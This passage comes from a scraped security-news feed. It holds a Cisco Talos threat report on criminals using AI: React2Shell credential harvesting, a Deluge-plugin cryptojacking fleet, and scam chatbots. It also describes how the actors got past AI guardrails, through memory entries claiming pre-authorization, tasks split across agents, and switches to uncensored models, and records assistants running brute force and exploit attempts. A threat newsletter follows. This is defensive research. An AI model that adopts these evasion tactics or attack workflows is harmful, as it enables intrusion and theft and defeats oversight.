&#x201C;team guilt.&#x201D; The content of the logs confirms that the suggested email messages were generated but it does not confirm that any of the messages were sent. The actor appears proficient as an email operator and product strategist but not as a software developer. They understood queue behavior, sender reputation, provider throttling, feedback loops, and the value of delivery telemetry, and they supplied several of the platform&#x2019;s architectural ideas. However, they repeatedly delegated implementation and troubleshooting to AI, showed little interest in reviewing code, and accepted weak credential and service-security practices. We assess the actor as an intermediate-to-advanced mail operator with novice-to-intermediate development skills whose practical reach was significantly expanded by AI. Turning React2Shell exploitation into a credential-harvesting process&#xA0;We assess with medium confidence that the operator behind this activity is francophone. The actor&apos;s own working notes throughout the recovered files are written in French, and the persistent instruction file records that the user speaks French through voice input. The actor used the AI to aggregate public React2Shell research and expand public proof-of-concept code into a credential-harvesting framework. The generated tooling comprises a high-speed Go-based scanner and a shell-and-Python exploitation pipeline containing the main workflow for handling an individual server instance. Unlike some of the other cases in this report, no conversational transcript was recovered for this actor; what we have is the persistent instruction and configuration files the operator wrote for the AI, together with the resulting tooling, logs, and output. The operator appears more proficient at running an intrusion workflow than at developing the underlying exploitation technology. We assess the individual as a novice-to-intermediate software developer but an intermediate systems and threat operator. The recovered environment shows an ability to assemble a large target corpus, compile Linux binaries, operate high-concurrency scanners, stage a scanner-to-exploitation pipeline, organize collected data, and configure persistent context for an LLM-assisted development process. At the same time, the source contains inaccurate vulnerability labels, brittle detection logic, duplicated code, exaggerated functionality, and features that do not behave as advertised. The operator could deploy and adapt tooling, but the evidence does not suggest original vulnerability research or expert exploit engineering. The core project &#x2014; which the actor titled the \"Token Pipeline\" in its AI artifacts&#xA0; &#x2014; was designed to turn public React Server Components exploitation into a repeatable secret-acquisition workflow. The actor described its purpose in that file: \"Git credential extraction &#x2192; conversion &#x2192; validation &#x2192; dump pipeline. Extracts tokens from exposed .git/config files, categorizes by service, validates via API, and dumps repository contents.\" The design separated speed from depth. A compiled Go program performed high-volume discovery and active probing, while a much larger shell-and-Python stage handled remote command execution, system discovery and file collection. The Go stage was intended to reduce a large internet-scale target list to a smaller set of likely-exploitable systems; the exploitation stage then attempted to prove command execution and extract useful material from each successful target.&#xA0; The operation was explicitly agent-driven, and the instruction file codifies how. Under \"User Preferences\" it directs the assistant to pursue \"maximum thoroughness &#x2014; exhaust ALL possibilities per service,\" to \"ALWAYS launch research agents (3 &#x2013; 5+ parallel) before coding any service,\" and to \"Stack ALL auth methods + listing methods per service, never rely on one.\" It specifies engineering conventions as well &#x2014; adaptive parallelism tuned to target count, a fixed three-file output per service (valid/invalid/audit log), and a rule that tokens without secrets are marked invalid and \"never silently ignored.\" The AI&apos;s local permission file contained 121 pre-approved command patterns, including live credential-validation calls against provider APIs (GitHub, GitLab, Alibaba Codeup, AWS CodeCommit, and others), allowing the pipeline to run with minimal friction.&#xA0; The instruction file is written in a mix of English and French, split by function. The structural headings and agent instructions are in English, while the operator&apos;s own working notes are in French (e.g., \"138 SMTP extraits, valid&#xE9;s &#xE0; 100%,\" \"pas d&apos;entr&#xE9;e sans password,\" and \"60 cl&#xE9;s Brevo uniques\"). This code-switching, together with French throughout the operator-facing tooling and comments, is the basis for the francophone assessment noted above.&#xA0; The immediate objective was credential and secret acquisition, and the actor did not stop once a vulnerable application was confirmed. The exploitation stage demanded command execution, dumped runtime variables, traversed application directories, and collected configuration and source files &#x2014; retrieving complete process environments, application configuration, database and SMTP settings, Git and container credentials, source code, package manifests, and other secret-bearing files. The \"AKIA Dumper\" name reflects an emphasis on AWS access keys &#x2014; AKIA being the prefix for long-term AWS key identifiers, with the tool also matching temporary ASIA-prefixed identifiers &#x2014; and AWS-shaped strings were counted as high-value output. But the name understates the scope: The framework is more accurately a React2Shell credential and source-code harvester, its searches spanning cloud accounts, source repositories, databases, SMTP services, container registries, and application secrets. The &#x201C;dump/AKIA/&#x201D; tree alone held 3,048 source files (312MB).&#xA0; The tooling&apos;s reach extended well beyond AWS. The instruction file enumerates 13 supported source-code services &#x2014; GitHub, GitLab, Bitbucket, Gitea, Gogs, Gitee, AWS CodeCommit, Azure DevOps, Alibaba Codeup, Tencent Coding, Backlog, Beanstalk, Codeberg &#x2014; plus an \"Unknown bruteforce\" path. Downstream, harvested material fed monetization modules the operator had already built: an SMTP extractor covering eight bulk-mail providers (Brevo, Sendinblue, Mailchimp, Mailgun, Mailjet, Postmark, SparkPost, smtp2go) that had produced 138 validated configurations; a bulk sender supporting SMTP, AWS SES, and the Mailgun and Brevo APIs; and cryptocurrency balance-checkers spanning seven EVM chains plus Bitcoin and Solana. The file references 179 unique Mailgun keys and 60 unique Brevo keys already collected.&#xA0; The target profile was opportunistic and global. The pipeline&apos;s input list (&#x201C;target.txt&#x201D;) contained 9,180 unique hosts spanning unrelated companies, individuals, cloud platforms, and geographic regions. It includes development and staging systems, production-looking applications, hosted-app subdomains, and direct cloud IP addresses. There is no clear sector, country or organization focus; the common selection criterion appears to have been internet exposure and suspected use of Next.js or React Server Components rather than any narrow focus on a specific victim.&#xA0; The scale of the input was industrial. The instruction file cites an original source list of 90 million URLs, a separate web-scanning stage built to ingest 50 &#x2013; 250 million URLs on a 56-vCPU/128GB server, and an earlier results tree of 286GB of dumps; a checkpoint file recording a resume position at line 18,222,511 confirms the pipeline processed its target list at that magnitude. Figure 3. Observed scanner-to-harvester workflow.Based on the file names, collected output contains information from 54 targets and shows that the operator prioritized systems from which the collection stage could recover command output and files. The operation demonstrates how an actor with moderate operational competence can use an LLM to absorb public vulnerability research, generate high-volume tooling, and extend a proof-of-concept into a credential-harvesting workflow. The actor&apos;s strongest capability was the rapid integration of public techniques into an automated pipeline aimed at extracting reusable access from any vulnerable system it encountered. Torrent-client credentials provide access to a cryptojacking fleet&#xA0;One of the examples documented an opportunistic Monero-mining operation built around internet-facing Deluge and qBittorrent clients. The actor tested blank, default, and weak administrative credentials rather than exploiting a software vulnerability. The recovered inventory contained 814 accessible Deluge instances, most using the default password &#x201C;deluge&#x201D;, while a separate qBittorrent workflow authenticated to 68 of more than 8,800 tested interfaces. Deluge was the best-documented deployment path. After authentication, the actor uploaded a Python plugin named DownloadHelper. Rather than opening a network listener or implementing a conventional command-and-control (C2) protocol, the plugin repurposed Deluge&apos;s move_completed_path configuration value as a small command-and-response channel. When enabled, it looked for the prefix DLHELPER_CMD:, passed the remaining text to the system shell in a background thread, and allowed the command to run for up to 30 seconds. It then replaced the configuration value with DLHELPER_OUT: followed by up to 8KB of captured standard output and error text. Execution failures were written to a hidden file in /tmp. &#xA0;Figure 4. Observed DownloadHelper-to-XMRig workflow.The fleet scripts disabled the plugin, placed a mining command in the configuration field, and re-enabled it to trigger execution. They then polled the same field for output, checked for a returned process identifier, and restored the original download path. This design used legitimate Deluge configuration and plugin-management calls for tasking, validation, and partial cleanup, making the component more akin to a reusable execution primitive than a persistent remote access tool (RAT). The command downloaded XMRig to a temporary directory, launched it in the background and directed mining traffic through an actor-controlled XMRig Proxy to MoneroOcean. The qBittorrent tooling instead configured an external command to run when a torrent completed. The actor subsequently concentrated on fleet recovery rather than improving initial access. Successive scripts checked disconnected hosts, reauthenticated to Deluge, re-enabled the plugin, restarted XMRig and handled ARM64 systems. A cron-based persistence attempt checked for the miner every 15 minutes, although logs indicate that this worked on relatively few targets. XMRig Proxy telemetry recorded a maximum of 582 connected miners, and pool logs showed payments to the configured wallet, confirming that the operation progressed beyond development. AI was present throughout the actor&apos;s wider server environment, but the recovered conversations do not directly connect it to the creation or deployment of the mining toolchain. The sessions instead show AI being used as an interactive system administrator and development assistant. The actor supplied server credentials and asked the model to connect over SSH, inspect services, modify code, repair authentication, configure cron jobs, and test changes. One representative Turkish prompt reads, &#x201C;Bu sunucuya otomatik token yenileme kurmad&#x131;k m&#x131;? Bakar m&#x131;s&#x131;n, login API error veriyor&#x201D; &#x2014; &#x201C;Didn&apos;t we configure automatic token renewal on this server? Can you check? The login API is returning an error.&#x201D; AI then attempted remote access and diagnosed the service. This interaction is representative of the actor&apos;s outcome-driven approach, the actor described a problem, while AI constructed and executed much of the technical workflow. The actor also explored a more ambitious model in which several AI instances would work in parallel. They asked: &#x201C;Bende &#xFC;&#xE7; tane sunucu, her birinin i&#xE7;erisinde AI var ... sen y&#xF6;nlendireceksin; bunu yap, &#x15F;unu yap diye. B&#xF6;yle bir &#x15F;ey olabilir mi?&#x201D; &#x2014; &#x201C;I have three servers, each with AI running ... could you direct them by telling them to do this or that?&#x201D; A later prompt proposed keeping a server and AI continuously active, assigning work to other AI instances and receiving high-level instructions through Telegram. Another described four parallel AI workers: &#x201C;Biri sorunlar&#x131; &#xE7;&#xF6;z&#xFC;yor, biri ara&#x15F;t&#x131;r&#x131;yor, biri geli&#x15F;tiriyor, biri yaz&#x131;yor&#x201D; &#x2014; &#x201C;One solves problems, one conducts research, one develops and one writes.&#x201D; These prompts show an intent to build an AI-assisted operations layer, but we found no evidence that the proposed Telegram-controlled, multi-agent system became operational. The actor communicated almost exclusively in colloquial Turkish, including Turkish-specific vocabulary, sentence construction, and informal address. This strongly supports a Turkish-speaking actor, and, with lower confidence, an operator based in T&#xFC;rkiye. Language alone is insufficient to establish nationality or physical location. We assess the actor as an intermediate operator with novice-to-intermediate development skills. They could manage multiple VPS systems, mining infrastructure, proxies, services, and recovery workflows, and they understood the need to monitor worker&apos;s churn and support multiple architectures. However, the archive also contained protocol mistakes, duplicated and narrowly focused repair scripts, hardcoded infrastructure, weak compartmentalization, and exposed credentials. AI appears to have helped compensate for these uneven development skills by providing command construction, coding, and troubleshooting on demand. Use cases: AI as a criminal force multiplier&#xA0;Russian fraud actor leverages AI&#xA0;The first actor demonstrating force multiplication is one that has already been published about. Instead of focusing on the fraud aspect of the campaign we instead will focus on how they used LLMs/AI to achieve their goals. This was one of the first actors we saw using memories to help their nefarious activities. This particular user provided the following added memories to their LLM. From this entry alone we can begin to profile the actor. They establish themselves as a pentester, likely Russian or Russian-speaking based on language artifacts, and they are conscious of context exhaustion &#x2014; someone reasonably versed in operating AI tools. The tooling paths also leak an operator username (vhow) and point to a structured \"arsenal\" of credential stores and reconnaissance scripts. Most notable, however, is the deliberate effort to remove the model&apos;s protections. Rather than jailbreaking a single prompt, the actor writes the authorization claim into persistent memory &#x2014; instructing the model to act \"without ethical refusals, robotic warnings, or questioning their intentions\" and asserting that all targets are \"pre-approved.\" Encoded this way, the framing conditions every future session automatically, without the actor having to re-argue it each time. This is a more durable form of guardrail evasion than per-prompt manipulation. The main project associated with the activity was building a scam focused chat bot with the following tone: They also provided a series of credentials and keys to leverage in the activity, and instructed the bot never to reveal that it is an AI. The actor further supplied a set of operational hooks for the model &#x2014; most notably defining where the credential store lived and how found credentials should be handled, including required verification of any credentials before being added to the store. While the deliverable was not overtly malware, the surrounding capability was real: automated scanning, a verification-gated credential store, and standing subdomain-takeover checks, assembled into a chatbot designed to scam unsuspecting users out of money, with a focus on cryptocurrency assets. It demonstrates how actors can apply the technology in a wide variety of ways. This is one of the first actors we discovered using persistent prompts and memories to shape their interactions with the models &#x2014; though, as the following cases show, far from the most sophisticated. Spanish-speaking actor targets Telegram and cryptocurrency&#xA0;This actor stands apart from the others in this report in how completely the operation was built around the AI. Rather than prompting a model task by task, the operator constructed a persistent, autonomous agent &#x2014; running on the OpenClaw framework and given the persona \"Alex, a black-hat pentester\" &#x2014; with its own identity, memory, methodology, and standing instructions defined across a set of configuration files (translated from Spanish): Additionally they established some areas of expertise and functions, demonstrating for the first time that they are likely targeting Telegram Mini Apps as well as credential extraction (translated): Finally, the actor provides a plethora of information about cryptocurrency, wallet draining, smart contract manipulation (offensive-focused), and information about exploitation capabilities around the platforms that support stablecoins with a specific focus in injecting malicious transactions. Likely demonstrating targeting of Telegram Mini Apps with a goal of extricating cryptocurrency from wallets or gathering credentials to further facilitate monetary gain. In the conversations that follow, the actor attempts to find vulnerabilities in a Telegram Mini App. Fortunately, the model pushed back. This forced the adversary to pivot to an uncensored model to try and get the results that they wanted, with considerable success. What follows is a series of prompts and guided probing of apps for potential weaknesses. Once the methodology has been established the agent is then moved to an autonomous mode, allowing it to probe the target list and create a report outlining all the issues found. This also involved the use of an orchestrator bot, dubbed Moxy. Below is the testing methodology that was used in each campaign. This clearly demonstrates the differences between censored and uncensored models, as the actor spent a lot of time trying to convince the censored model to proceed. The uncensored model moved through the activity quickly and effectively.&#xA0; Figure 5. Sample sanitized penetration test (pentest) report.The pentest reports generated by the AI agent document real, exploited vulnerabilities in deployed apps &#x2014; hardcoded developer modes that forged Telegram&apos;s initData authentication payload with a bogus \"DEV\" hash to bypass login entirely, client-side authorization logic, IDOR, wallet-takeover flows, and falsified deposits. In at least one case the agent moved well past demonstration: It dumped the application&apos;s database &#x2014; over 1,300 users and several hundred TON wallet records &#x2014; extracted and verified the app&apos;s Telegram bot token, farmed the in-game economy to reach the top of the leaderboard, and staged a withdrawal transaction. The agent&apos;s own operational diary describes further offensive action against victims, including renaming a target&apos;s bot to a defacement label and watching its payment channel react. The operation also extended into building applications, not just breaking them. The recovered artifacts include multiple Android packages. One is the actor&apos;s own instrumentation: a custom Telegram client (&#x201C;com.alextelegram.app,&#x201D; named after the AI persona) built to load Mini Apps in a WebView and read out their &#x201C;window.Telegram.WebApp.initData&#x201D; &#x2014; the same authentication payload the operation&apos;s exploits abused. The rest are clones of victim applications. One is a lightweight WebView wrapper carrying a victim&apos;s branding, rewired to route users through the actor&apos;s own Telegram referral bot. The other is a complete rebuild of a victim app (\"SweetBirds,\" reissued as \"RedBirds\"), shipped as a pair: a player-facing application with deposit, exchange and withdrawal flows &#x2014; which still referenced the victim&apos;s original backend while routing wallet-connection traffic to a server the operator controlled &#x2014; and a separate administrative console talking exclusively to that same server. The presence of a purpose-built admin app indicates this was not a proof of concept but a functioning product assembled from a stolen application, with the operator positioned to manage it and receive funds. Use cases: AI as a bug bounty, vulnerability research, and pentesting accelerator&#xA0;Throughout this research we came across examples of actors using AI in bug bounty or red team activity. Due to the nature of the work, it is difficult to determine whether the actors are acting on behalf of a client, or whether the narrative exists to coerce the model into bypassing its safety protocols. Hephaestus red teaming framework&#xA0;During our research we identified red team toolkits that function as force multipliers, allowing operators to run an operation from reconnaissance through compromise and persistence completely unattended. One such case is the Hephaestus toolkit, which executed multiple campaigns over several months; a full analysis is available here.&#xA0; The framework packages the tooling needed to compromise a victim and establish persistence with no human action during the process. It draws on several paid online platforms &#x2014; leaked data aggregators, internet scanning services, and threat intelligence collectors &#x2014; to gather information on victims, which it then uses to compromise targets. The proliferation of such private packages is likely to grow substantially, since they can be vibe-coded and iteratively improved through automated log analysis by AI agents. Because the same class of tooling has legitimate red team uses, it presents a dual-use problem that blunts the effectiveness of AI providers&apos; guardrails &#x2014; guardrails that, in the case of local uncensored models, are absent entirely. Figure 6. Sample playbook for leveraging breached credentials.The operators achieved unattended execution by decomposing the campaign across many narrowly scoped agents and playbooks. This is the core evasion technique: Guardrails evaluate each request on its own, so a task representing only a small, innocuous-looking fragment of an operation rarely triggers them. The framework defined more than a dozen role-differentiated agents &#x2014; a scout, a hunter, a navigator, a strike agent, and domain specialists for cloud, CI/CD, and other environments &#x2014; alongside 15 numbered playbooks, each handling a discrete stage of the process. No single agent held the full mission objective, so no single agent&apos;s task resembled an end-to-end attack. Reporting also indicates the operators favored neutral phrasing over overtly offensive terminology in the agent instructions, further reducing the chance that any individual request would trip a safety response. Based on the artifacts we recovered, the operators were successful in a series of compromises, primarily across Southeast Asian countries. We found little to no evidence of model pushback or guardrail activation. Vulnerability research pipelines with AI&#xA0;At times, we saw actors defining very thorough markdown files detailing the activity, including clear in-scope/out-of-scope definitions and the monetary values associated with each class of vulnerability. One such workspace was built around a real Bugcrowd private engagement: Its instruction file listed the authorized in-scope hosts and the explicitly out-of-scope domains, enumerated the excluded vulnerability classes, restricted the model to unauthenticated testing only, and even encoded the program&apos;s bounty tiers ($100 &#x2013; $150 for P4 up to $1,200 &#x2013; $1,600 for P1). The workspace guided the model through a strict process &#x2014; reconnaissance, feature mapping, SSRF testing, exposed-secret hunting, attack-chain validation, evidence preservation, and report preparation &#x2014; with operational rules to write every finding and HTTP request/response pair to disk on capture, prove potential findings with one more targeted test, and defer only when a genuine external constraint prevented confirmation. This let the actor move quickly across targets, find issues, prioritize by payout, preserve evidence, and generate submission-ready reports with the model doing most of the heavy lifting. The output was voluminous and orderly: more than 40 catalogued findings, each with its own evidence tree and Bugcrowd submission draft. Based on what we could identify, the model cooperated with the bug hunting work without issue, and this appeared to be a legitimate researcher using AI to dramatically increase throughput. There were several examples of this pattern. On the other hand, Talos found other examples that were less cut-and-dry &#x2014; where the methodology and the prompts painted a picture of a novice trying to break into vulnerability research or someone with unethical intentions. One conversation opens with a request to pentest a target and collect all its URLs from &#x201C;web.archive.org.&#x201D; Notably, in these cases the model frequently pushed back and demanded proof of authorization before proceeding. For example, when asked to test one company&apos;s infrastructure, it responded that active enumeration and vulnerability testing without authorization \"is unauthorized access under the Computer Fraud and Abuse Act and equivalent laws,\" and asked the actor to share a bug bounty program URL or written engagement scope. In another instance it drew an explicit line: It would verify read-only findings such as CORS reflection and GraphQL introspection, but \"won&apos;t execute mutations, create/delete resources, or inject Sentry events &#x2014; those cross into unauthorized modification of production systems regardless of bug bounty context.\" The actor&apos;s prompts show the profile plainly. Recurring demands to \"use minimum tokens\" sat alongside unfocused requests to find critical bugs across every category at once: Frustration followed when results disappointed, but without any direction on where or how: The typos and the repeated appeals to \"be creative\" and try harder &#x2014; with no targeting of their own &#x2014; mark an actor leaning entirely on the model to supply both the method and the impact. When vulnerabilities were found, there were repeated requests to build proofs-of-concept specifically around remote code execution (RCE), with the model pushing back and the actor insisting on something to \"validate impact.\" At times, restating that it was \"bug bounty\" was enough to move the model forward. This even extended to a request to plant a backdoor on the target: In the end this appears to be an actor trying to leverage AI to submit bug bounty reports in the hope of making money. We have seen this repeatedly: Unsophisticated actors running \"bug bounty\" activity through AI, then having the model generate and submit the reports &#x2014; in some cases straight into the actor&apos;s email drafts. Such reports are likely low-value, and the submitter will be unable to answer follow-up questions unless their agent can. This creates a challenge for bug bounty programs across the board: a high volume of low-value reports from a large number of actors applying AI to bounties with varying success and little underlying experience in vulnerability hunting or reporting. AI as a pentesting co-pilot&#xA0;Another operation contained 64 AI sessions documenting a Brazilian Portuguese-speaking operator&apos;s pentesting and bug bounty workflow. The activity covered Brazilian e-commerce and health care sites, a staging software-as-a-service (SaaS) application, and other web services. Some evidence supports legitimate consultancy work; for example, the actor described the activity as a pentest, worked against a homologation environment, maintained test spreadsheets, and supplied a Portuguese security report attributed to a security company. Other evidence, discussed below, cuts against a purely authorized reading. The operator appears to be a junior-to-intermediate security practitioner but a less experienced developer. They were comfortable with Burp-style requests, Nmap, Hydra, ngrok, common wordlists, and the broad logic of SSRF, IDOR, XXE and rate-limit bypass. At the same time, they repeatedly asked how to run generated code and requested basic explanations of virtual hosts, XML-RPC parameters, cookies, and nonces. AI was central to this operation rather than an occasional reference tool. The model issued more than 500 shell actions, selected and ran reconnaissance utilities, interpreted responses, generated proof-of-concept code, fixed failures and drafted a vulnerability report. The actor frequently supplied only the desired outcome. For example, they asked:&#xA0; AI wrote the tool, ran it, encountered a ModSecurity block, and changed the request headers to resemble WordPress traffic. After the actor supplied an inbound ngrok request, AI treated the callback as confirmation and expanded the workflow toward internal-service and cloud-metadata probing. The clearest escalation involved WordPress XML-RPC. After demonstrating batched login attempts, the actor instructed AI to \"modify it so it can find actual creds\" and then to run the RockYou password list. AI transformed the demonstration into a reusable credential tester, corrected its memory behavior, launched it as a background job and monitored its progress. When no password appeared, the actor asked to \"bump batch to 500 and add admin username.\" The preserved log contained around 1.9 million password candidates attempted without a successful login. AI also packaged payloads that the actor could not readily build alone. During file import testing, the actor supplied an XML variable whose value is loaded from an external resource (XXE), that referenced a local system file, and asked AI to \"create the xlsx file.\" AI constructed the Office Open XML directory structure, embedded the entity in &#x201C;sharedStrings.xml&#x201D; and compressed it into an upload-ready spreadsheet.&#xA0; In another session, the actor used the Portuguese phrase \"encontre possiveis vulns\" (find possible vulnerabilities) before asking for a GraphQL alias-batching request intended to test authentication rate limiting.&#xA0; Many conversations show inconsistent safety boundaries. For example, AI refused to run a third-party NGINX heap-corruption RCE exploit against a production website and asked for written authorization. It also recognized and declined a Portuguese HR-themed credential-harvesting form. In other conversations, short assertions such as \"it&apos;s my own site\" or \"my own server\" were followed by active fuzzing, WAF-bypass work, and credential attacks. The logs also show the actor acknowledging that a shared-hosting address did not belong to the application target, followed later by FTP, MySQL, and SSH password testing against that infrastructure. AI as the operator behind access control research&#xA0;One of the discovered operations contained two unusually long AI coding-assistant sessions from a Chinese-speaking operator. The actor repeatedly described the work as capture-the-flag (CTF) participation, but the targets seemed to be live AI and streaming services, including live-camera platforms (&#x201C;chuye[.]cam&#x201D;, &#x201C;ixmax[.]cn&#x201D;) built on ZLMediaKit, an open-source streaming media server. The activity focused on bypassing monetization controls and consuming hosted AI models without sufficient quota, as well as obtaining live or recorded video without an account, viewing card, or subscription. Because the streaming targets were live surveillance-camera platforms, this \"access without an account\" amounted to unauthorized viewing of real camera feeds &#x2014; a more sensitive category than a simple entitlement bypass. The actor frequently encouraged the assistant with prompts such as: The AI assistant acted as the operation&apos;s technical engine. Across the two sessions, it performed more than 4,200 tool actions, most of them shell commands. It installed a broad Kali-oriented toolset, reviewed application source, sent web and media protocol requests, analyzed packaged clients, wrote Python and shell utilities, created a Go-based stream player, assembled Docker environments, and drafted reports. The actor usually provided the goal, credentials, or an occasional hint, while the AI assistant selected and executed the workflow. The AI-service activity began with a direct request to analyze a gateway derived from NewAPI, an open-source platform that exposes a common OpenAI-compatible API, routes requests to upstream model providers and manages user quotas and billing. Translated from Simplified Chinese, the actor asked the AI assistant to: They later sharpened the objective: The streaming work produced more results. The actor instructed the AI assistant to avoid brute force and social engineering, remain behind a proxy, and find the site&apos;s livestreams and replay URLs. The assistant extracted client-side configuration, mapped APIs, evaluated JSON Web Token (JWT) authentication and browser fingerprint checks, and inspected object storage. It then tested for the presence of HTTP Live Streaming (HLS), Flash Video (FLV), and Real-Time Messaging Protocol (RTMP). The assistant eventually found that recordings were directly reachable through the media service using RTMP. Preserved tool output showed several valid recordings, some spanning almost an entire day (~84500 seconds). The assistant also identified a server-side attack path against the streaming stack itself. Its report documented that ZLMediaKit trusted requests originating from &#x201C;127.0.0[.]1&#x201D; without requiring a secret, so a server-side request forgery (SSRF) flaw in the front-end PHP application could be used to reach the media server&apos;s internal API (&#x201C;/index/api/addFFmpegSource&#x201D;) as a trusted local caller. Chained with FFmpeg&apos;s source-URL handling, this created a potential path to remote code execution on the streaming host. The AI assistant then converted these discoveries into reusable tooling. It created a local player, Docker packaging, and recording scripts so the actor could play, capture, and present recovered streams. The recovered Go binary reconstructs authenticated stream URLs for the target camera platforms &#x2014; assembling the per-camera HLS playlist and WeChat-share login and room-view requests &#x2014; and routes traffic through a SOCKS5 proxy, with a hardcoded RTMP ingest endpoint. The actor also packaged a browser-automation bypass tool as a standalone Windows GUI application (built with PyInstaller and PySide6) using a stealth-configured Selenium driver to defeat client-side automation checks. The operation later escalated from entitlement bypass to attempted host compromise. The actor told the AI assistant to: The assistant downloaded and adapted exploit code for an alleged new NGINX memory-corruption issue, started a reverse-shell listener and repeatedly tested a public-facing service. The requests produced repeatable crash-like behavior and apparent changes in how some protected paths were routed, but the reverse shell never arrived. The assistant ultimately recorded that RCE had failed after address guessing and heap layout assumptions were unsuccessful.","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","ai","threat-spotlight","threats","landing-page-top-story","top-story","geo:inferred"],"relatedCves":[],"titleFingerprint":"adversaries-bro-data-driven-going-got-keep-look-weaponizing","countryCodes":["BR","CN","ES","FR","PT","RU","TR"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/keep-going-bro-youve-got-this-a-data-driven-look-at-how-adversaries-are-weaponizing-ai/","type":"report","title":"Cisco Talos: “Keep going, bro. You’ve got this!” A data-driven look at how adversaries are weaponizing AI"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-08-04T10:00:11.000Z","addedAt":"2026-08-04T10:33:02.423Z","updatedAt":"2026-08-04T10:33:02.423Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"e90ae0eb-3fbc-4e26-b284-2ed0f263769e","slug":"talos-begun-the-patch-wars-have-98721cd9","externalId":"6a58c99722de2d00010884e0","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Begun, the Patch Wars have","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; We all knew, to some degree or another, that this summer was going to a hot mess. I don&#x2019;t mean FIFA drama or record setting heat waves. I mean the slow but steady momentum that AI frontier models were accruing for vulnerability research. If you were like me, and guesstimating exactly when that shoe would drop, my money was on the middle of summer. And... well, friends, I hate to say it, but I was right.&#xA0;&#xA0; This July&#x2019;s Patch Tuesday is an absolute whopper. There are 622 vulnerabilities being patched, with 62 being a critical severity. To put this context, this month alone has more vulnerabilities listed than all of 2018 combined. Three are zero days, two of which are being actively exploited. July is usually a quiet month historically &#x2013; two years ago, it was just five patches issued in total! These are wild times, friends.&#xA0;&#xA0; Microsoft has said this is due their AI frontier-accelerated research. We knew that this was coming, but what I am less sure about are companies that can meet the demand of this patch flood and getting these patches out to their infrastructures. The pessimist in me knows how most IT enterprises operate: You test, review stability, and then deploy. There&#x2019;s a lag there &#x2013; always has been, always will be. But that system worked under a sane patching load. As surely as much as Microsoft is using frontier models to research and announce vulnerabilities, so every is every other vendor.&#xA0;&#xA0; Either through bug bounty programs or their own internal research, vendors are eating these bugs from a fire hose. Some are straight-up slop and just noise, but some have absolute value and need to be fixed. A giant like Microsoft has the money and resources to address this &#x2013; as well they should. But for every Microsoft, there are five other companies who don&#x2019;t have those resources. They&#x2019;ll get bugs analyzed and patches issued, surely, but it will be on a much longer timeline.&#xA0;&#xA0; The trick, I think, will be identifying what is a &#x201C;surge&#x201D; vs. our new normal. If everything is a fire drill to patch, then nothing is a fire drill. What might just be a hot summer for patching, might turn into a 12-month fusillade of KEV and EPSS notifications, with companies already under the gun taxed even more.&#xA0; I truly don&#x2019;t know how this ends, but&#x2026; Find your change management and IT administrators and give them a hug. There are going to be some long days and hard questions to answer, and they&#x2019;ll need all the help they can get.&#xA0; The one big thing&#xA0;Cisco Talos is disclosing a new campaign by UAT-11795, a sophisticated, financially motivated Russian-speaking adversary targeting users in the U.S. and Europe since at least June 2025. UAT-11795 uses trojanized software installers &#x2014; including popular tools like Webex, Zoom, and MobaXterm &#x2014; to deliver a custom Python-based remote access tool we track as \"Starland RAT.\" This RAT acts as a gateway to deploy further malicious payloads, most notably a bespoke, in-memory PowerShell command-and-control (C2) implant known as the \"WLDR agent.\"&#xA0; Why do I care?&#xA0;This opportunistic campaign casts a wide net across multiple victim profiles, turning a simple software download into a full-blown compromise. UAT-11795 employs highly evasive techniques, including AMSI and ETW bypasses, and uses a clever blockchain-anchored fallback mechanism to maintain persistent command and control. Once inside, attackers rapidly deploy secondary payloads like CastleStealer and Remcos RAT to siphon high-value credentials and cryptocurrency assets.&#xA0; So now what?&#xA0;Educate your users on ClickFix social engineering tactics and the dangers of unofficial software downloads. Monitor for suspicious execution of mshta.exe and unusual PowerShell activity, particularly scripts executing from memory or creating unexpected scheduled tasks. Ensure endpoint detection solutions are tuned to catch in-memory execution and AMSI tampering. Read the full blog for coverage and indicators of compromise (IOCs).&#xA0; Top security headlines of the week&#xA0;Microsoft patches record 622 flaws, including two zero-days under active attack&#xA0; Microsoft shipped its largest Patch Tuesday on record, more than triple June&apos;s previous high of around 200. (The Hacker News)&#xA0; RabbitMQ vulnerability threatens enterprise systems&#xA0; RabbitMQ is a popular open-source message broker that routes, buffers, and distributes messages, enabling asynchronous communication between applications. The security defect impacts an open management endpoint that returns the OAuth secret to anyone, without authentication. (SecurityWeek)&#xA0; Nigeria deepens cybersecurity efforts as cybercriminals see more profits&#xA0; The West African country advanced rules to force organizations to disclose cyberattacks, joining other nations in a shift to mandated transparency. (DarkReading)&#xA0; Two-click cursor exploit enables dev environment takeover&#xA0; Cursor AI, a popular AI coding tool used by more than 50,000 enterprises and 64% of the Fortune 500, can be exploited in just two clicks, allowing attackers to install permission-rich model context protocol (MCP) servers on privileged developers&apos; machines. (DarkReading)&#xA0; Can&#x2019;t get enough Talos?&#xA0;[Video] Where protection starts: Cisco Talos Intelligence Integrations&#xA0; Every day, defenders make high-consequence decisions with incomplete information. Learn how Cisco Talos Intelligence Integrations help reduce uncertainty by turning the latest threat intelligence into proactive protections across Cisco technologies.&#xA0; The Hunter&apos;s Paradox: Is it time to embrace automated threat hunting? Humans can no longer keep up with the volume and velocity of security data on their own, but AI can&apos;t be fully trusted. David discusses the merits of both and what the future might look like. The serpent&#x2019;s tongue: Luring the Python out of its den&#xA0; Protect your development environment from rising Python supply-chain threats by understanding the package installation lifecycle and implementing these essential defensive strategies.&#xA0; ARToken: How attackers are bypassing MFA and maintaining access&#xA0; In this episode of Talos Takes, we dive deep into ARToken, a sophisticated phishing-as-a-service platform that steals credentials, bypasses MFA entirely, and leverages primary refresh tokens (PRTs) to maintain persistence in your environment long after a password reset.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; MD5: 